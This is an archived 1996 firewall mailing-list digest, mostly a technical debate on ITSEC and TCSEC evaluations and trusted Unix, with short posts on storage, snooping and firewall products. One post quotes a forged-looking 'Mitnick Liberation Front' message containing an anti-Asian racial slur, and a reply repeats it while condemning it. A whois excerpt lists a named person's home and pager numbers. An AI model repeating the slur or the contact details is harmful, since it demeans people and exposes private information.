I would settle initially for a warranty of the evaluation which is theoretically what the certificate is. The legal situation is a minefield because information technology is developing very much faster than legislation. In the case of ITSEC, the national scheme bodies are responsible for licensing the CLEFs and for issuing the certificates. That's all very worthy and it's a big advance on previous attempts at producing a criteria environment which aims to serve all information users. The national scheme bodies are supposed to be drafting specific agreements so that an evaluation in Germany, or the UK, or wherever, is formally accepted in any other ITSEC subscribing country. So far the only agreement is between UK and Germany to cover evaluations in either country. There are protocols between several countries including some which do not publicly acknowledge ITSEC and the technical agreement between Germany and UK was drafted very quickly.
What has presented major challenges is reaching agreement on legal wording of agreements. Now that UK and Germany have produced a legal agreement, it should be much easier for all the other countries because there is a model to work from.

To move from there, every scheme body could warrant an evaluation, but would have to include, I believe, a copy of the vendor's TOE. That would mean that the scheme body accepts its implied responsibility as the regulating body licensing the CLEFs. That would not mean that they warrant the supply by a vendor or the application of the evaluated products by the user. Further actions would be needed to do that and there is no reason why a scheme body could or should accept responsibility for any actions outside the criteria definition and the evaluation/certification system.

Where I believe this process is very important is in supporting the future development and use of applications. At present some countries' court systems will accept computer evidence and others will not. Right now no court should accept computer evidence because systems do not provide the necessary assurance to show that a particular system worked reliably at all times when data was transmitted, processed, accessed, or stored. There is multiple opportunity to manipulate data covertly. That relates directly to firewalls as well as other elements in electronic trading/information exchange. It is one major barrier to secure employment of EDI. Today corporations employing EDI have to set up their own legal trading agreements and it won't be long before some of those agreements are tested in court and fail. Therefore criteria such as ITSEC potentially play a very much wider role in corporate risk control than just allowing a sysad to claim the hole is not in his side of the boat, or giving senior management a warm feel.

>
> I think that reasonable people can come to an understanding on these issues.
> However, there are some very complicated issues.
> For example, our claim
> of "virus prevention" has been accepted by the UK ITSEC folks as an
> evaluatable claim. Note that this is the first time at any level that they
> have accepted ANY virus-related claim. So we make some statements about
> what must be true for this to be effective.

ITSEC theoretically provides for every possible risk condition to be evaluated and reported. However, functionality like encryption and virus checking have generally been excluded for several reasons, not least that other government agencies declare proprietary interest over the national scheme bodies.

> If a virus does indeed get into
> the system, there are (at least) four possibilities as to how it happened:
> (1) Our virus prevention claim was made in error, but that error was not
> detected by the CLEF (or by NSA, since we are also in B2 eval).

I firmly believe that the evaluators should accept responsibility for their evaluation. If the vendor makes a false claim or a simple mistake, the whole purpose of evaluation is to identify this. What ITSEC really needs (or any other succeeding criteria) is a CLEF Inspectorate with the powers to apply sanctions and remove licenses. It also requires the will to enforce those sanctions. The original UK CLEFs did a good job. They made mistakes in the early days because they were still learning. I know of at least one certified product which had a very serious hole not picked up by the CLEF. However, those original CLEFs have become much more efficient and capable. The main problem may be with a dramatic increase in the number of CLEFs. At least one ITSEC country is talking about licensing 120 CLEFs. Not every national scheme body will monitor CLEFs as effectively as others. That suggests the need for an international CLEF inspectorate. One important feature of the ITSEC concept was that the evaluation facilities would not constrict the market demand through insufficient funded capacity.
This addresses a primary weakness of TCSEC where evaluation capacity frequently was inadequate, creating a queue of products awaiting evaluation. However, if the numbers of CLEFs were to dramatically increase, monitoring their performance also needs an expansion in inspectorate capacity and funding.

> (2) The site violated the conditions necessary to provide virus
> prevention.

Virus prevention/killing can present particular problems, but a user really needs both a risk policy and an accreditation system rather than hoping a firewall built of B1 (or whatever level) elements is adequate. That's not a whole lot different from vehicles. A manufacturer should accept responsibility for designing a safe and reliable vehicle which will perform all of the tasks claimed for it. However, if a user decides not to learn to drive correctly, or does something really stupid, that should not be the responsibility of the vendor.

> (3) The claim was valid to the E4/B2 level of assurance, but no (current :-)
> system is perfect, and some flaw not detectable by the current analysis and
> proof methods exists in the product.

That's true of any system and why you never have 100% risk reduction. ITSEC goes a long way to addressing this issue because the vendor provides a TOE against which the product is measured. As the criteria is employed on more and more products and higher levels are routinely measured that system improves. It probably also calls for still further tightening of documentation and is claimed as the justification for employing formal methods widely, not just to the higher levels of assurance.

> (4) We introduced an error in the
> product after certification.

Would that not be a later unevaluated version? ITSEC still doesn't have a RAMP system like TCSEC. That has advantages and also dangers because some vendors do have v.1.0. certified and then only sell v.2.X versions, but still claiming they are certified product.
I think the responsibility is with the vendor to tell the customer that v.1.0 has been evaluated and certified but he is trying to sell v.2.x which has changes. TCSEC was hampered by rigid adherence to exact detailed configurations and RAMP. That meant that if you wanted a certified product you had to employ dated products which many customers don't want to do. I think the answer is to allow choice. Those who want certified versions should be able to get them but those who want later functionality/versions should understand what they are buying.

>
> So, how do you determine which of the above four reasons was the cause?
> And what do you do about it? What if a real loss of a ton o' money resulted?
> What do you do about it?
>
> These are difficult questions to answer. One way is to pay a ton o' money
> for the product if you want the warranty, and the company and/or CLEF
> get insurance. Another way is to punt on the whole issue.
>
> [SNIP]
>
> > In terms of arguing which OS is the most secure, that's a false
> > position. A certificate only states how well a product performed
> > under test against one set of conditions. It provides a reasonably
> > level playing field in that all B1 certified products met the same
> > minimum standards, but it doesn't necessarily show that some B1
> > products also do other things which make them more suitable for some
> > risk management requirements.
>
> And the truth of the matter is that the TCSEC is based on what was doable
> 15 years or more ago. It doesn't deal with several classes of threats, such
> as viruses and administrators. (Administrators are responsible for 75% of
> all security violations - intentional and unintentional - yet they are
> considered a part of the TCB by the TCSEC and the ITSEC.) Our system addresses
> these issues, which appears as a claim in the ITSEC certificate, but not the
> TCSEC eval. So it is sometimes very difficult to rate systems.
>
> And I agree that we have an issue regarding "most secure." As you indicate,
> it all depends upon your threat profile.

Agreed, but there is also the matter of accreditation and enforcement. All the criteria attempt to cover some aspects which really ought to be dealt with as site issues under system accreditation. That raises several other important issues. Most users don't have any real form of risk policy. Most of the few that do have weak policies because there is no enterprise policy tying all the objectives and tasks together and linking the many elements of the enterprise. That's part of the false comfort with firewalls. So many people actually use the firewall approach to avoid giving adequate consideration to risk management.

>
> [SNIP]
>
> >
> > That's fine and there are many trusted OS around covering from C2
> > upwards. If you insist on a definition of UNIX as 'based on AT&T
> > source code etc.', it could be argued that no UNIX can exceed
> > F-B2/E4. A purist may also argue that even that is not a true UNIX
> > and F-B1/E3 is the limit.
>
> Well, we, of course, are the exception to the rule. But we wrote our
> kernel from scratch to be high assurance. We are in at E4. And don't
> tell my CEO, but there is no reason that we or our CLEF can see which
> would prevent us from going E5 or E6. In fact, ... (he just walked in, so
> I'll stop talking about this now! :-)

That covers one challenge of evaluations. There are several products which could achieve higher than E3 without modification. However, evaluation costs money. If most users don't even understand the basic benefits of trusted systems, the market gets dramatically smaller with each level up the chain. As some vendors have discovered the hard way, having a high assurance and a good product can mean marketing failure even though that product may not be significantly more costly than a much lower level assurance.
The result is that a development team may find that in achieving say E3, they have to do many things to their product which leads to a major rework along the lines of DG-UX. When they finish, they may have a product which could be presented for say E6. The bean counters look at the CLEF quote for an E6 evaluation and the very much lower cost of E3 and fight hard to force down the evaluation target to save money. Marketing looks at it and sees 2 problems. An E6 evaluation may greatly extend the time to certification so losing sales to folk who want E2 or E3 today. The other thing they see is that most of their market thinks it wants E2 but could economically be sold onto E3. Marketing and finance together also look at the sale price and the gross margins which again encourages a lower target.

A driving factor has to be customer demand and funding. If every user demanded, and was prepared to pay for, products which were well engineered and supported, most of today's products would not be on the market. The reality is that most customers don't approach their requirements that way, often because of lack of knowledge, but also because they haven't found out how to sell the benefits to the people who hold the gold in their enterprises. Of course that's not entirely a customer failing, but also a failing on the part of vendors to see the benefits, understand them and communicate them to the customers.

>
> >
> > There is also the argument that the OS flavour and UNIX-like
> > qualities are irrelevant in building special duty systems like
> > firewalls which do not need to mount typical general purpose computer
> > applications and do not need to host many direct users (depends what
> > you are trying to achieve, but a trusted barrier system requires 3
> > direct users normally and everyone else is an indirect user in
> > transit).
> > There is some merit in this argument and a typical firewall
> > implementation may well include some devices which not only don't
> > employ a trusted OS but don't use UNIX either.
>
> Unix is an API. "Trust" is basically the quality of the underlying
> mechanisms. There is absolutely no reason why you can't put - say - an
> NT API in our OS and look like NT, and be certifiable. (Hmmmmmm -
> "certifiable" takes on a new meaning here! :-) I think that it is an error
> to confuse the two. I think that for most people, "UNIX" means AT&T source
> base UNIX. In that case, I agree with the above assessment. In fact, I
> do not think that you can go above B1 with such a source base, without a
> complete rewrite, in which case it is no longer that source base.
>
> >
> > Many of the arguments by MS fanatics in favour of NT etc., hinge on a
> > belief that Bill Gates couldn't possibly produce a product with
> > defects. The main argument in favour of UNIX, other than some people
> > already use it and are familiar with the calls and screens, is that a
> > trusted system developer can obtain source code and carefully
> > re-engineer the OS to remove the standard looney tune features that a
> > common UNIX has.
>
> A problem with this is commercial acceptance. The OS will not be successful
> unless it runs standard applications transparently. But that's another
> discussion!

Agreed in general computing although it should not be an issue with something like a firewall which should not be running general applications.

>
> >
> > Trying to do that with something like NT is vastly more difficult not
> > because the products present technology difficulties, but because of
> > the way Microsoft trades and reluctantly makes partial source code
> > available to outsiders after considerable difficulties.
>
> You don't need source code to implement the NT API.

That's true but working on proprietary product in that way won't help you cover all of the issues.
>
> >
> > [SNIP]
> >
> > There is already a very wide selection of B1/B1+ UNIX OS available,
> > the majority of which depend on SecureWare technology to achieve the
> > assurance. They achieve the same advantages as untrusted UNIX in
> > terms of application portability and most are highly configurable.
>
> And at least one B2/E4 system (well, really in B2 and E4 eval system), and
> that is Data General's commercial Unix system.

Yes and other products will enter eval at and above that level. In technical terms the arms race is on. In marketing terms it hasn't really started yet.

>
> [SNIP]
>
> >
> > When someone claims to know everything about an OS, I really do begin
> > to wonder. That rare animal may exist and be worth his weight in gold
> > several times over. Even the owners of UNIX (or most other OS) find
> > large areas of product which they really don't understand any more,
> > and probably didn't understand that well at the time the code was
> > cut, but they leave alone to save time and money. If a competent
> > engineer went through a typical UNIX and stripped out those chunks of
> > code which do nothing for him, the end product would look very small.
>
> At B2 and E4, **ALL** code that is even referenced to administer the system
> is evaluated and must meet strict standards of architecture, design,
> documentation, implementation, and testing, as well as exactly match the
> user and administrative documentation. This is not the case at B1 and below
> or E3 and below. That is why B2 and E4 are the minimum levels at
> which the term "high assurance" can apply (IMHO), and why we did such a
> system. It's the only way we could honestly state that we truly believe
> that the system works as we say it works (with the warning that there
> are undiscovered flaws in the system, but no one has yet discovered them
> using a very rigorous process - yet they do exist).
In general I would agree with the basis of the argument, but recognise that some users will have requirements which can be met in other ways. The important thing for them to understand is what they need and why they need it, rather than the crude desire to buy cheap products.

> > One of the things which a trusted UNIX developer has to do is to pull
> > the starting product apart and understand what each piece does,
> > remove the nasty bits, and add some code to develop the required
> > functionality. He also has to document everything in a way which
> > would make many developers faint.
> >
> > The primary reason for difficulty in taking UNIX above F-B1/E3 is
> > that you are still left with some areas which can't be fully
> > documented back to origination because of the way the product was
> > originally developed and documented. It's not impossible and the
> > re-engineering tool kit developed under the Armadillo One
> > specification went a long way to addressing the issues, but it's still
> > very expensive to do and requires a great deal of highly skilled
> > labour at computer scientist rather than computer engineer level.
>
> That is why we wrote it from scratch, with stringent software engineering
> methods.

Yes, it can have a lower cost and a shorter development cycle. However, many reasons, including commercial and marketing considerations, make re-engineering attractive for several product areas. For example, it would probably be much more successful to re-engineer something like Word Perfect and upgrade the existing user base than to set up a new company and build a new product, even if an engineering approach would be better served by new engineering.

> > [SNIP]
> >
> > Although there are several issues I don't agree with in the higher
> > levels of TCSEC and ITSEC, international networking and electronic
> > trading require a level of risk reduction which demands capabilities
> > beyond F-B2/E4.
> > The point can be argued, but a good B1+ product
> > already addresses a number of key areas such as trusted path and
> > trusted audit beyond B3. There is the question of whether customers
> > are prepared to pay for that and many people probably enjoy playing
> > roulette with their organisation's future.
>
> I agree completely, EXCEPT that the ITSEC does not talk about functionality.
> The E4 level of assurance is the minimum necessary to accomplish what you
> want, I think. The feature set must be extended (as we have done) to
> accomplish the rest (so long as all of it is E4 or greater).
>
> > It could be that the way forward will mean that UNIX, as it stands
> > today, is inappropriate and that we should go back to basics, decide
> > what the real benefits of UNIX are and then incorporate them in a new
> > open OS environment. If we do that there is no reason why we can't
> > build an OS which performs even beyond the levels described at A1,
> > and we may need to do that.
>
> Hmmmmmm - A1 assurance is not trivial. We need to develop some new
> formal tools, I think, before those levels can be reached.
>
> In fact, just to make our B2 system commercial (i.e., meaning that it
> comes out at the same time as our standard unix system, and is in sync
> with the standard system) required that we invent new methodologies and
> formal methods to deal with issues such as least privilege and covert
> channels. (And anyone who thinks that covert channels don't affect the
> average system simply doesn't yet understand the manner in which covert
> channels can be exploited.)

Moving from conventional to trusted development is a major step for a vendor and generally costly. Right now there is no shortage of methodologies and tools, but many of them are not at all well known and many are distinctly user-unfriendly.
Maybe one day every vendor will employ trusted development practices as standard and find that this actually reduces development costs after the initial culture shock.

> > [SNIP]
> >
> > In the meantime we have to live with what we have. Waiting for Bill
> > Gates to deliver NT2121 with every possible functionality you could
> > ever ask for (and a promise that all the bugs will be removed by
> > NT3030), in an environment where Bill claims you can't even build a
> > dishwasher without bundling NT with the washing powder, means that
> > you either believe in immortality, or you are thinking of a better
> > world for your great great great grandchildren and praying the world
> > is still around then.
>
> I think that a different and definitely achievable goal is that you have
> a B2/E4 system that runs shrink-wrapped NT apps unmodified, but provides
> REAL security and protection from the real threats faced by the organization,
> and is at least as easy to administer as NT is.
>
> > Ian J-B.
>
> Thanks for your comments, Ian.

My pleasure, and thanks for your responding comments.

Ian J-B

From firewalls-owner Sat Feb 10 21:28:08 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA17143 for firewalls-outgoing; Sat, 10 Feb 1996 21:23:28 -0800 (PST)
Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA17138 for ; Sat, 10 Feb 1996 21:23:23 -0800 (PST)
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id XAA12143 for GreatCircle.COM!firewalls; Sat, 10 Feb 1996 23:18:35 -0600 (CST)
Received: by ris1.nmti.com (smail2.5) id AA22475; 10 Feb 96 23:44:49 CST (Sat)
Received: by sonic.nmti.com; id AA04760; Sat, 10 Feb 1996 23:15:33 -0600
From: peter@nmti.com (Peter da Silva)
Message-Id: <9602110515.AA04760@sonic.nmti.com.nmti.com>
Subject: Re: Non-company Access ??
To: allyn@allyn.com (Mark Allyn)
Date: Sat, 10 Feb 1996 23:15:33 -0600 (CST)
Cc: ken@bridge.com, frankw@in.net, Dick_Wall@stratus.com, firewalls@GreatCircle.COM
In-Reply-To: <199602100125.RAA25941@mark.allyn.com> from "Mark Allyn" at Feb 9, 96 05:25:36 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> This can get mighty unwieldy. Where are you going to keep those
> gigabytes of data?

Let's say you splurge and spend $20/tape for super quality 120m DAT.

That's $2.50/gigabyte compressed.

Doesn't seem a problem to me.

From firewalls-owner Sat Feb 10 21:55:56 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA17710 for firewalls-outgoing; Sat, 10 Feb 1996 21:40:03 -0800 (PST)
Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA17705 for ; Sat, 10 Feb 1996 21:39:57 -0800 (PST)
Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA198; Sun, 11 Feb 1996 00:39:02 -0500
Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF819.1D5FD300@rwcooper.RC.Toronto.on.ca>; Sun, 11 Feb 1996 00:37:25 -0500
Message-ID: <01BAF819.1D5FD300@rwcooper.RC.Toronto.on.ca>
From: Russ
To: "'Brosl Hasslacher'"
Cc: "'Firewalls'"
Subject: RE:
Date: Sun, 11 Feb 1996 00:37:24 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I fail to see how making a derogatory racial slur in public in any way promotes your ideas or position. In case you hadn't noticed, in today's society, it simply shows how stupid, immature, and ignorant you are. These are hardly the qualities I would look for in someone I might consider listening to. As to the point of your message, it's moot, I didn't get past the words "slanty-eyed chink".
Cheers,
Russ

From firewalls-owner Sat Feb 10 23:09:35 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA20410 for firewalls-outgoing; Sat, 10 Feb 1996 22:55:12 -0800 (PST)
Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id WAA20404 for ; Sat, 10 Feb 1996 22:55:07 -0800 (PST)
Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id RAA17564; Sun, 11 Feb 1996 17:24:14 +1030 (CST)
Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA20914; Sun, 11 Feb 1996 17:24:12 +1030
Received: by mallee.awadi (SMI-8.6/SMI-SVR4) id RAA11640; Sun, 11 Feb 1996 17:24:10 +1030
From: blymn@awadi.com.au (Brett Lymn)
Message-Id: <199602110654.RAA11640@mallee.awadi>
Subject: Re: 125 megabit infra-red
To: frankel@yu1.yu.edu (Mervyn Frankel)
Date: Sun, 11 Feb 1996 17:24:09 +1030 (CST)
Cc: firewalls@greatcircle.com
In-Reply-To: from "Mervyn Frankel" at Feb 10, 96 10:07:42 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to Mervyn Frankel:
>
> Infra-red offers security that other technologies do not,
>

Maybe, maybe not - I'm sure that there is some spread in the IR beam which could be picked up by a snooper in the right position.

--
Brett Lymn, Computer Systems Administrator, AWA Defence Industries
===============================================================================
"Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue.
From firewalls-owner Sun Feb 11 05:10:27 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA05090 for firewalls-outgoing; Sun, 11 Feb 1996 05:02:31 -0800 (PST)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA05048 for ; Sun, 11 Feb 1996 05:02:21 -0800 (PST)
Received: from maestro.Maestro.COM by relay2.UU.NET with SMTP id QQaclo04079; Sun, 11 Feb 1996 08:01:02 -0500 (EST)
Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA09503; Sun, 11 Feb 96 07:50:22 EST
Date: Sun, 11 Feb 1996 07:50:21 -0500 (EST)
From: Sick Puppy
To: firewalls@count04.mry.scruznet.com
Cc: firewalls@GreatCircle.COM
Subject: Re: Hoo Dat?
In-Reply-To: <199602102012.MAA03720@count04.mry.scruznet.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> the real tail :) is told by the raw packet dump and
> doing forensics on that... BTW when I was

Thanks for the advice. Will concentrate on getting a raw packet dump of attempted connects from the attacking domain.
SP, tCED cDm

From firewalls-owner Sun Feb 11 05:39:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA05909 for firewalls-outgoing; Sun, 11 Feb 1996 05:37:23 -0800 (PST)
Received: from iez.com ([194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA05904 for ; Sun, 11 Feb 1996 05:37:14 -0800 (PST)
Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA09128; Sun, 11 Feb 1996 14:37:07 +0100
Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma007332; Sun Feb 11 14:36:46 1996
Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA13182; Sun, 11 Feb 1996 14:33:02 +0100
Message-Id: <9602111333.AA13182@spibm02>
Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA29458; Sun, 11 Feb 96 14:32:59 +0100
Received: by inhps-a (1.38.193.3/16.2) id AA21938; Sun, 11 Feb 96 14:32:50 +0100
From: Rolf Weber
Subject: Re: Most Secure Unix?
To: ianj-b@dial.pipex.com (Ian Johnstone-Bryden)
Date: Sun, 11 Feb 1996 14:32:49 +0100 (MEZ)
Cc: firewalls@greatcircle.com (firewalls)
In-Reply-To: from "Ian Johnstone-Bryden" at Feb 8, 96 05:43:36 pm
X-Mailer: ELM [version 2.4 PL24]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>
> >
> > > I think perhaps my point wasn't made clearly. The firewall can
> > only be as
> > > good as the OS on which it exists. If your firewall is an
> > application
> > > on top of an OS, I can break the firewall by breaking the OS.
> > >
> > I never heard of any breakin possible because of a kernel bug.
> > Maybe I'm wrong, maybe it's possible, but I cannot imagine.
>
> You are wrong and, not only is it possible, it's been done

Well, my statement was written a little bit fast. A lot of nice people sent me information about this SunOS bug. I heard of it, too, but not very much.
Maybe it was exploited to break into hosts, maybe even into firewalls, but that's not the point! The point is that the pure kernel is one of the strongest parts of the chain, at least not the weakest. It's a simple fact that every security system has to trust a few simple things (which could be buggy). It's the administrator's job to take care.

No comments about the ITSEC etc. stuff. I would only repeat myself. I know too little about it, I don't care for it at all. I don't say it's worthless, but it's worthless for me, it's worthless for my security configuration and it's worthless for firewalls at all (that's, of course, just MHO).

rolf

--
-----------------------------------------
Rolf Weber               | All I ask is a chance
IEZ AG D-64625 Bensheim  | to prove that money
++49-6251-1309-113       | can't make me happy.

From firewalls-owner Sun Feb 11 06:54:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA07798 for firewalls-outgoing; Sun, 11 Feb 1996 06:47:38 -0800 (PST)
Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA07793 for ; Sun, 11 Feb 1996 06:47:26 -0800 (PST)
Received: from anubis.network.com by nsco.network.com (4.1/1.34) id AA07524; Sun, 11 Feb 96 08:49:07 CST
Received: from beldar.network.com by anubis.network.com (4.1/SMI-4.1) id AA07236; Sun, 11 Feb 96 08:47:49 CST
From: robp@anubis.network.com (Rob Peglar)
Message-Id: <9602111447.AA07236@anubis.network.com>
Subject: Re: Non-company Access ??
To: peter@nmti.com (Peter da Silva)
Date: Sun, 11 Feb 1996 08:52:04 -0600 (CST)
Cc: allyn@allyn.com, ken@bridge.com, frankw@in.net, Dick_Wall@stratus.com, firewalls@greatcircle.com
In-Reply-To: <9602110515.AA04760@sonic.nmti.com.nmti.com> from "Peter da Silva" at Feb 10, 96 11:15:33 pm
X-Mailer: ELM [version 2.4 PL21]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Actually, when you have 100 terabytes of data to keep, the problem isn't usually cost, it's data management. You _could_ spend $250,000 for 100 TB of 120m DAT, and end up with lotsa little tapes to keep track of.

[warning: sales-ish paragraph follows]

Or, you could use a (gasp!) mainframe or other suitable large Unix-based machine, behind a good set of firewall routers and servers, and a slick tape silo (e.g. from Storage Tek) subsystem at the tail end of the flow.

Rob

> > This can get mighty unwieldy. Where are you going to keep those
> > gigabytes of data?
>
> Let's say you splurge and spend $20/tape for super quality 120m DAT.
>
> That's $2.50/gigabyte compressed.
>
> Doesn't seem a problem to me.
>

--
Rob Peglar
Network Systems Corp., a StorageTek Company
robp@network.com
7600 Boone Ave N.
Mpls.
MN 55428
612.391.1028
612.391.1404 (fax)

From firewalls-owner Sun Feb 11 10:39:12 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11303 for firewalls-outgoing; Sun, 11 Feb 1996 10:24:13 -0800 (PST)
Received: from count04.mry.scruznet.com (count04.mry.scruznet.com [204.147.227.68]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA11296 for ; Sun, 11 Feb 1996 10:24:07 -0800 (PST)
From: firewalls@count04.mry.scruznet.com
Received: from count04.mry.scruznet.com (localhost [127.0.0.1]) by count04.mry.scruznet.com (8.7.3/8.7.1) with ESMTP id KAA05734; Sun, 11 Feb 1996 10:11:54 -0800 (PST)
Message-Id: <199602111811.KAA05734@count04.mry.scruznet.com>
To: Brosl Hasslacher
cc: firewalls@GreatCircle.COM, firewalls@count04.mry.scruznet.com
In-reply-to: Your message of "Sat, 10 Feb 1996 17:24:20 PST." <199602110124.RAA24100@azazel.sdsc.edu>
Subject: WARNING POSSIBLE MAIL FORGERY IN PROGRESS
Date: Sun, 11 Feb 1996 10:11:54 -0800
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Looks like we have either a mail forger working with address forgery on one of Tsutomu's machines, or someone has managed to pervert Brosl's account... so tell us, "Brosl", which is it... or someone is fooling greatcircle.com... no great trick BTW.

The original messages:

>
>Script started on Sun Feb 11 09:29:51 1996
>Sun Microsystems Inc.
>SunOS 5.4 Generic July 1994
>$ show 3905
>(Message inbox:3905)
>Return-Path: firewalls-owner@GreatCircle.COM
>Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by count01.mry.scruznet.com (8.7.1/8.7.1) with ESMTP id XAA07472 for ; Sat, 10 Feb 1996 23:38:06 -0800 (PST)
>Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP
>    id QQacka21320; Sat, 10 Feb 1996 22:13:17 -0500 (EST)
>Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA08768 for firewalls-outgoing; Sat, 10 Feb 1996 17:25:06 -0800 (PST)
>Received: from azazel.sdsc.edu (azazel.sdsc.edu [132.249.22.242]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA08763 for ; Sat, 10 Feb 1996 17:25:03 -0800 (PST)
>Received: (bhass@localhost) by azazel.sdsc.edu (8.7.1/8.6.10) id RAA24100 for firewalls@greatcircle.com; Sat, 10 Feb 1996 17:24:20 -0800 (PST)
>Date: Sat, 10 Feb 1996 17:24:20 -0800 (PST)
>From: Brosl Hasslacher
>Message-Id: <199602110124.RAA24100@azazel.sdsc.edu>
>To: firewalls@GreatCircle.COM
>Sender: firewalls-owner@GreatCircle.COM
>Precedence: bulk
>Content-Type: text
>Content-Length: 371
>
>Greetings and Salutations from the Mitnick Liberation Front
>:
>It seems that once again, that slanty-eyed chink Tsutomu has made another
>dollar at the expense of a hacker, Kevin Mitnick.
>
>In reality, Kevin Mitnick had no skills.
>
>But we do.
>
>Tsutomu's Kung-Foo is _still_ no good.
>
>Maybe we should read his book to be "skilled" in the art of Unix security?
>
>Nah.
>
>%dh%
>(EOF):
>$ exit
># whois 132.249
>San Diego Supercomputer Center (NET-SDSC2)
>   P.O.
>   Box 85608
>   San Diego, CA 92138
>
>   Netname: SDSC
>   Netnumber: 132.249.0.0
>
>   Coordinator:
>      Hutton, Thomas  (TH60)  hutton@SAND.NET
>      (619) 534-5136 (DSN) (Pager) (DSN) (619) 494-4938 (HME) (619) 485-8649
>
>   Domain System inverse mapping provided by:
>
>   DNS1.SDSC.EDU        198.17.46.33, 198.17.47.33
>   DNS2.SDSC.EDU        198.17.46.32, 198.17.47.32
>   DNS2.ITD.UMICH.EDU   141.211.164.3
>   UCSD.EDU             128.54.16.1, 132.239.1.1, 132.239.254.201
>
>   Record last updated on 25-Jul-95.
>
>The InterNIC Registration Services Host contains ONLY Internet Information
>(Networks, ASN's, Domains, and POC's).
>Please use the whois server at nic.ddn.mil for MILNET Information.
># telnet 132.249.22.242 25
>Trying 132.249.22.242 ...
>Connected to 132.249.22.242.
>Escape character is '^]'.
>220 azazel.sdsc.edu ESMTP Sendmail 8.7.1/8.6.10 ready at Sun, 11 Feb 1996 09:44:25 -0800 (PST)
>quit
>221 azazel.sdsc.edu closing connection
>Connection closed by foreign host.
>#
>script done on Sun Feb 11 09:32:12 1996

From firewalls-owner Sun Feb 11 14:24:14 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA15652 for firewalls-outgoing; Sun, 11 Feb 1996 14:09:44 -0800 (PST)
Received: from netcom10.netcom.com (netcom10.netcom.com [192.100.81.120]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA15637 for ; Sun, 11 Feb 1996 14:09:40 -0800 (PST)
Received: by netcom10.netcom.com (8.6.12/Netcom) id OAA27320; Sun, 11 Feb 1996 14:07:09 -0800
Message-Id: <2.2.32.19960210230817.006b1cb0@netcom10.netcom.com>
X-Sender: dalel@netcom10.netcom.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 10 Feb 1996 16:08:17 -0700
To: "Douglas M. Todd, Jr."
From: Dale Lancaster
Subject: Re: NT Firewalls/Web Servers
Cc: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:06 AM 2/7/96 -0500, Douglas M. Todd, Jr.
wrote:
>Does anyone know of any good NT Firewalls and Web Servers?
>

Just around the corner from you is our HQ for Raptor Systems. We just released an NT-based firewall. A 50 user license, list price is $6k. Check out www.raptor.com for more info. This firewall is the same as the one we have on various Unix flavors.

regards :-)

dale

======================================================================
Dale Lancaster                 Raptor Systems              dalel@netcom.com
"It's better to be thought a fool rather than              (214) 423-6212
 to speak up and remove all doubt." - Lincoln
======================================================================

From firewalls-owner Sun Feb 11 14:28:44 1996
